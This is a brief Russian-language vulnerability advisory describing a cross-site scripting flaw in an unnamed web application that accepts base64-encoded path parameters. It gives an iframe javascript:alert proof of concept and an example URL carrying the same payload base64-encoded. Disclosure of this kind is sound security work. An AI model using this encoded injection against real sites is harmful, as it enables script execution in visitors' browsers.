Уязвимость:
Путь директории показывается в 64 битной кодировке. Это можно
использовать для XSS-атак. Использование:
Код JavaScript используется в тегах. Например, [IFRAME
SRC="javascript:alert('XSS');"][/IFRAME]
С использованием URL,
http://www.example.com/?dir=Scene&file=PElGUkFNRSBTUkM9ImphdmFzY3JpcHQ6YWxlcnQoJ1hTUycpOyI+PC9JRlJBTUU+